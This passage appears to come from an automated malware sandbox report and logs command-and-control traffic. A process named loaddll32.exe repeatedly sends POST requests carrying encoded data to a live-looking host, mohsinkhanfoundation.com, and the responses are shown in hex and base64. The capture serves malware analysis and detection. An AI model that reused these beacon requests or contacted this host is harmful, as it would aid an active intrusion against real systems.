                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:06.359461069 CEST1482INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:05 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 65 6b 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9ekJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          25192.168.2.749796107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:06.693687916 CEST1490OUTPOST /pcQLeLMbur/P34KJnkbASUWPzEYIgcWQntyfmF6fHNifWV9 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:07.106373072 CEST1491INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:06 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 65 6b 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9ekJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          26192.168.2.749798107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:07.417212963 CEST1500OUTPOST /pcQLeLMbur/ES1CfXZ5ZHp6d2V4ZXs= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:07.873385906 CEST1501INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:07 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 65 30 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9e0JBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          27192.168.2.749800107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:08.143009901 CEST1510OUTPOST /pcQLeLMbur/GAUAID5zCzE+BzoOJAtGenN5Yn59cmV+YXw= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:08.534300089 CEST1511INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:08 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 64 45 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9dEJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          28192.168.2.749802107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:08.841104984 CEST1513OUTPOST /pcQLeLMbur/fxgDNT4yEngregozMnp+J0N6dX1le310YXlkfA== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:09.234930038 CEST1521INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:08 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 64 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9dUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          29192.168.2.749804107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:09.495845079 CEST1522OUTPOST /pcQLeLMbur/DxMffwwOHXMHeXJDenV9ZXt9dGF5ZHw= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:09.906132936 CEST1530INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:09 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 39 64 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt9dUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          3192.168.2.749751107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:47.943732023 CEST997OUTPOST /pcQLeLMbur/eDkkAA0bInx9RnpzeWJ+fXJlfmF8 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:48.418602943 CEST1005INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:47 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 3610
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2f 64 45 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 63 74 4c 32 38 75 63 6d 74 30 64 6d 74 36 65 32 78 2f 65 32 70 37 66 47 39 39 65 6d 74 30 64 6d 73 76 66 6d 78 38 65 6d 6f 76 66 6d 39 39 66 6d 74 30 4c 57 74 2f 65 57 78 38 65 32 70 7a 4c 6d 39 2b 65 47 74 38 4c 47 74 79 4b 57 78 36 65 57 70 36 65 47 39 7a 4b 47 74 37 66 57 74 34 63 32 78 2f 4c 57 6f 70 65 32 39 2f 4b 32 74 2b 65 57 74 35 65 6d 77 70 4c 57 70 34 66 57 38 6f 65 6d 73 74 4c 47 74 35 4b 47 78 35 65 6d 70 38 4c 32 39 37 65 47 74 2b 4c 47 74 34 65 32 77 73 65 6d 6f 6f 4b 6d 39 37 4c 6d 74 38 66 6d 73 70 66 47 77 71 65 57 6f 74 66 47 39 2b 65 47 74 35 65 47 74 79 4b 57 78 36 65 57 70 36 66 47 39 7a 4b 47 74 34 66 57 74 35 4b 47 78 2f 65 6d 6f 76 66 47 39 7a 4b 47 74 34 66 32 74 39 63 32 78 33 66 6d 6f 6f 66 47 39 38 66 6d 74 34 4c 6d 74 36 65 6d 77 72 65 32 70 2b 66 47 39 7a 4b 47 74 34 64 32 74 37 63 32 78 33 4b 57 70 2b 64 47 39 35 65 6d 74 38 66 6d 73 75 65 47 77 71 65 47 70 34 4c 32 39 2f 63 32 74 30 4c 57 74 35 66 32 78 33 4b 57 70 37 66 57 38 76 66 47 74 2f 66 6d 73 73 4c 57 78 38 65 6d 6f 6f 66 47 38 71 4b 57 73 76 66 6d 73 70 4c 57 78 2f 4c 32 70 37 66 57 38 6f 66 57 74 2f 64 32 73 76 65 32 78 34 66 6d 6f 74 65 47 39 37 65 57 74 37 4b 32 73 73 63 32 78 38 4b 57 70 38 4b 47 39 35 66 6d 74 37 65 6d 73 76 65 57 78 36 63 32 70 7a 4c 6d 39 2b 63 6d 74 2b 65 32 74 36 65 6d 77 72 65 47 70 39 65 6d 39 7a 4b 47 74 38 4c 47 74 2b 4b 57 78 33 4b 57 70 2b 64 47 39 36 4b 57 74 38 66 6d 73 75 65 47 78 33 4b 57 70 37 65 47 39 7a 4b 47 74 38 66 6d 73 75 65 32 78 33 63 6d 70 2f 65 47 39 35 66 6d 74 2b 65 32 74 2f 4b 57 78 36 4b 57 70 39 66 57 39 2b 63 32 74 35 4c 6d 74 2f 65 6d 77 70 4c 57 6f 75 66 47 39 2b 63 6d 74 35 4b 57 74 2f 4b 6d 78 33 4b 57 70 36 66 6d 38 75 4b 47 74 30 65 57 74 2f 4c 32 78 35 63 32 70 39 4b 57 39 39 66 32 74 37 65 32 74 36 65 32 78 35 63 32 70 38 65 32 39 39 63 32 74 36 4b 6d 74 38 63 6d 78 36 66 32 70 39 64 47 39 2f 4b 57 74 37 65 47 74 34 66 57 78 2f 66 47 6f 74 4b 6d 38 76 66 32 73 70 64 32 74 36 65 32 78 2f 65 32 70 37 66 47 39 37 65 6d 74 2f 66 6d 73 73 4c 57 78 36 66 47 70 2b 65 32 39 2b 66 57 74 35 65 47 74 2f 66 47 78 35 63 32 70 34 4c 57 39 2b 66 47 74 37 64 6d 73 72 66 47 77 70 4c 57 6f 76 65 57 38 75 63 32 73 74 65 32 74 36 65 32 78 2f 65 32 70 37 66 47 39 2b 4b 47 74 2f 66 6d 73 70 63 6d 78 36 65 6d 70 2b 66 57 39 39 4b 32 74 38 66 47 74 2f 65 6d 78 36 65 6d 70 39 64 47 39 79 65 6d 74 39 4b 57 74 36 65 32 78 2f 65 32 70 2b 66 32 39 2b 65 6d 74 36 64 32 74 2f 66 47 78 33 63 6d 70 79 4b 6d 38 6f 66 47 73 71 4b 57 73 75 66 6d 78 36 65 32 6f 75 64 57 39 7a 4b 57 74 38 66 32 74 36 65
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt/dEJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUctL28ucmt0dmt6e2x/e2p7fG99emt0dmsvfmx8emovfm99fmt0LWt/eWx8e2pzLm9+eGt8LGtyKWx6eWp6eG9zKGt7fWt4c2x/LWope29/K2t+eWt5emwpLWp4fW8oemstLGt5KGx5emp8L297eGt+LGt4e2wsemooKm97Lmt8fmspfGwqeWotfG9+eGt5eGtyKWx6eWp6fG9zKGt4fWt5KGx/emovfG9zKGt4f2t9c2x3fmoofG98fmt4Lmt6emwre2p+fG9zKGt4d2t7c2x3KWp+dG95emt8fmsueGwqeGp4L29/c2t0LWt5f2x3KWp7fW8vfGt/fmssLWx8emoofG8qKWsvfmspLWx/L2p7fW8ofWt/d2sve2x4fmoteG97eWt7K2ssc2x8KWp8KG95fmt7emsveWx6c2pzLm9+cmt+e2t6emwreGp9em9zKGt8LGt+KWx3KWp+dG96KWt8fmsueGx3KWp7eG9zKGt8fmsue2x3cmp/eG95fmt+e2t/KWx6KWp9fW9+c2t5Lmt/emwpLWoufG9+cmt5KWt/Kmx3KWp6fm8uKGt0eWt/L2x5c2p9KW99f2t7e2t6e2x5c2p8e299c2t6Kmt8cmx6f2p9dG9/KWt7eGt4fWx/fGotKm8vf2spd2t6e2x/e2p7fG97emt/fmssLWx6fGp+e29+fWt5eGt/fGx5c2p4LW9+fGt7dmsrfGwpLWoveW8uc2ste2t6e2x/e2p7fG9+KGt/fmspcmx6emp+fW99K2t8fGt/emx6emp9dG9yemt9KWt6e2x/e2p+f29+emt6d2t/fGx3cmpyKm8ofGsqKWsufmx6e2oudW9zKWt8f2t6e


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          30192.168.2.749806107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:10.182096958 CEST1532OUTPOST /pcQLeLMbur/ICYbCzstHxl+BhF4Jg5+GH0FRX5yeGV9eXNkeWJ4 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:10.603671074 CEST1540INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:10 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 38 66 45 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt8fEJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          31192.168.2.749810107.180.44.12580C:\Windows\System32\loaddll32.exe
